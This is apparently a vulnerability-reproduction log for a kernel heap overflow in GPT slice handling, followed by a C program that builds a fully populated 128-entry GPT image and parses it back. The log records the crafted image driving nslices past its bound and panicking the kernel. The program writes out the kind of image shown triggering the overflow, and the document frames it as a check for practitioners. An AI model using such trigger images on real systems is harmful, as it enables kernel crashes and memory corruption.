DF-0074 / run.log
=== attaching crafted GPT image (128 entries) to vn0 ===
attach rc=0
/dev/vn0
/dev/vn0s0
/dev/vn0s1
/dev/vn0s10
/dev/vn0s11
/dev/vn0s12
/dev/vn0s13
/dev/vn0s14
/dev/vn0s15
/dev/vn0s16
/dev/vn0s2
/dev/vn0s3
/dev/vn0s4
/dev/vn0s5
/dev/vn0s6
/dev/vn0s7
/dev/vn0s8
/dev/vn0s9
=== single DIOCGSLICEINFO (proves overflow: nslices should be 130) ===
DIOCGSLICEINFO returned nslices=130
trigger rc=0
=== stress: 5 ioctl+fd-churn iters + fork/exit churn (induces panic) ===
[0] DIOCGSLICEINFO returned nslices=130 (overflow happened)
[1] DIOCGSLICEINFO returned nslices=130 (overflow happened)
[2] DIOCGSLICEINFO returned nslices=130 (overflow happened)
[3] DIOCGSLICEINFO returned nslices=130 (overflow happened)
[4] DIOCGSLICEINFO returned nslices=130 (overflow happened)
fork/exit churn to force fdfree slab validation...
stress done; if we got here, no synchronous panic this run.
stress rc=0
=== parallel flood (16 procs) to churn slab zones hit by the overrun ===
------------------------------------------------------------------------
NOTE: output ends here because the SSH session was killed (exit 124 /
Connection lost) when the kernel panicked during the parallel flood.
The trigger had already returned nslices=130 five times in the stress
section above, proving the 28 KB heap overflow executed. The panic
signature for this run ("panic: slaballoc: corrupted zone" /
"Fatal trap 12 ... slab_cleanup", depending on heap layout) is in
panic.txt, captured from dfbsd-qemu/boot.log. vm.sh status => down
immediately after. Reproduced across three fresh-boot runs (vm.sh reset).
------------------------------------------------------------------------
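Added example, not part of the harness or of run.log: a C program that builds a GPT image whose 128-entry partition array is fully populated (protective MBR, primary and backup header, both CRC32s) and then parses it back the way a disk driver would before sizing its slice table, counting in-use entries. Image geometry (4096 LBAs of 512 bytes), GUIDs, partition sizes and names are assumptions; the actual image attached to vn0 above is not on this page.

```c
/* Build and verify a GPT image with all 128 partition entries populated.
 * Geometry, GUIDs and names are assumed; they are not taken from run.log. */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define LBA_SIZE     512u
#define GPT_ENTRIES  128u                                   /* all populated */
#define GPT_ENTRY_SZ 128u
#define ARRAY_LBAS   ((GPT_ENTRIES * GPT_ENTRY_SZ) / LBA_SIZE) /* 32 LBAs */
#define IMAGE_LBAS   4096u                                  /* assumed: 2 MiB */
#define IMAGE_BYTES  ((size_t)IMAGE_LBAS * LBA_SIZE)
#define PART_LBAS    16u                                    /* assumed size */

static uint32_t crc32_le(const uint8_t *p, size_t n) {    /* standard CRC-32 */
    uint32_t c = 0xFFFFFFFFu;
    for (size_t i = 0; i < n; i++) {
        c ^= p[i];
        for (int k = 0; k < 8; k++) c = (c >> 1) ^ (0xEDB88320u & (0u - (c & 1u)));
    }
    return ~c;
}
static void put32(uint8_t *d, uint32_t v) { for (int i = 0; i < 4; i++) d[i] = (uint8_t)(v >> (8 * i)); }
static void put64(uint8_t *d, uint64_t v) { for (int i = 0; i < 8; i++) d[i] = (uint8_t)(v >> (8 * i)); }
static uint32_t get32(const uint8_t *s) { uint32_t v = 0; for (int i = 3; i >= 0; i--) v = (v << 8) | s[i]; return v; }
static uint64_t get64(const uint8_t *s) { uint64_t v = 0; for (int i = 7; i >= 0; i--) v = (v << 8) | s[i]; return v; }

/* One 92-byte GPT header at LBA `at`, alternate at `alt`, entry array at `arr`. */
static void write_header(uint8_t *img, uint64_t at, uint64_t alt, uint64_t arr, uint32_t arr_crc) {
    uint8_t *h = img + at * LBA_SIZE;
    memset(h, 0, LBA_SIZE);
    memcpy(h, "EFI PART", 8);
    put32(h + 8, 0x00010000u);                 /* revision 1.0 */
    put32(h + 12, 92);                         /* HeaderSize */
    put64(h + 24, at);                         /* MyLBA */
    put64(h + 32, alt);                        /* AlternateLBA */
    put64(h + 40, 2 + ARRAY_LBAS);             /* FirstUsableLBA = 34 */
    put64(h + 48, IMAGE_LBAS - 2 - ARRAY_LBAS);/* LastUsableLBA */
    memset(h + 56, 0xD1, 16);                  /* DiskGUID: assumed constant */
    put64(h + 72, arr);                        /* PartitionEntryLBA */
    put32(h + 80, GPT_ENTRIES);                /* NumberOfPartitionEntries */
    put32(h + 84, GPT_ENTRY_SZ);               /* SizeOfPartitionEntry */
    put32(h + 88, arr_crc);                    /* PartitionEntryArrayCRC32 */
    put32(h + 16, crc32_le(h, 92));            /* HeaderCRC32, field zeroed while summing */
}

/* Fill img (IMAGE_BYTES) with a protective MBR, both GPT copies and 128
 * non-empty entries. Returns the entry-array CRC. */
uint32_t build_gpt_image(uint8_t *img) {
    memset(img, 0, IMAGE_BYTES);
    uint8_t *mbr = img + 446;                  /* protective MBR: one 0xEE partition */
    mbr[2] = 0x02; mbr[4] = 0xEE; mbr[5] = mbr[6] = mbr[7] = 0xFF;
    put32(mbr + 8, 1);
    put32(mbr + 12, IMAGE_LBAS - 1);
    img[510] = 0x55; img[511] = 0xAA;

    uint8_t *arr = img + 2 * LBA_SIZE;
    for (uint32_t i = 0; i < GPT_ENTRIES; i++) {
        uint8_t *e = arr + i * GPT_ENTRY_SZ;
        memset(e, 0xA5, 16);                   /* non-zero type GUID: entry in use (assumed) */
        memset(e + 16, 0x5A, 15); e[31] = (uint8_t)i;  /* distinct unique GUID */
        uint64_t first = 2 + ARRAY_LBAS + (uint64_t)i * PART_LBAS;
        put64(e + 32, first);
        put64(e + 40, first + PART_LBAS - 1);
        char name[8]; int n = snprintf(name, sizeof name, "p%u", i);
        for (int k = 0; k < n; k++) e[56 + 2 * k] = (uint8_t)name[k]; /* UTF-16LE name */
    }
    uint32_t arr_crc = crc32_le(arr, GPT_ENTRIES * GPT_ENTRY_SZ);
    memcpy(img + (IMAGE_LBAS - 1 - ARRAY_LBAS) * LBA_SIZE, arr, GPT_ENTRIES * GPT_ENTRY_SZ);
    write_header(img, 1, IMAGE_LBAS - 1, 2, arr_crc);
    write_header(img, IMAGE_LBAS - 1, 1, IMAGE_LBAS - 1 - ARRAY_LBAS, arr_crc);
    return arr_crc;
}

/* Parse the primary GPT as a driver would: signature, header CRC, bounds,
 * array CRC, then count entries with a non-zero type GUID. -1 if invalid. */
int gpt_count_used(const uint8_t *img, size_t len) {
    if (len < (2 + ARRAY_LBAS) * LBA_SIZE) return -1;
    const uint8_t *h = img + LBA_SIZE;
    if (memcmp(h, "EFI PART", 8) != 0) return -1;
    uint8_t tmp[92]; memcpy(tmp, h, 92); memset(tmp + 16, 0, 4);
    if (crc32_le(tmp, 92) != get32(h + 16)) return -1;
    uint32_t n = get32(h + 80), sz = get32(h + 84);
    uint64_t off = get64(h + 72) * LBA_SIZE;
    if (sz < 128 || off > len || (uint64_t)n * sz > len - off) return -1;
    if (crc32_le(img + off, (size_t)n * sz) != get32(h + 88)) return -1;
    static const uint8_t zero[16]; int used = 0;
    for (uint32_t i = 0; i < n; i++)
        if (memcmp(img + off + (size_t)i * sz, zero, 16) != 0) used++;
    return used;
}

int main(int argc, char **argv) {
    uint8_t *img = malloc(IMAGE_BYTES);
    if (!img) return 1;
    build_gpt_image(img);
    printf("in-use GPT entries: %d\n", gpt_count_used(img, IMAGE_BYTES));
    if (argc > 1) { FILE *f = fopen(argv[1], "wb"); if (f) { fwrite(img, 1, IMAGE_BYTES, f); fclose(f); } }
    free(img);
    return 0;
}
```

Run with a path argument to write the image to a file, or with none to only report the in-use entry count. The parser is the check a practitioner wants next to a run like the one above: the number of in-use entries, not any fixed constant, is what a GPT parser turns into slices, and any table sized by a compile-time bound has to be compared against that count before the entries are copied in.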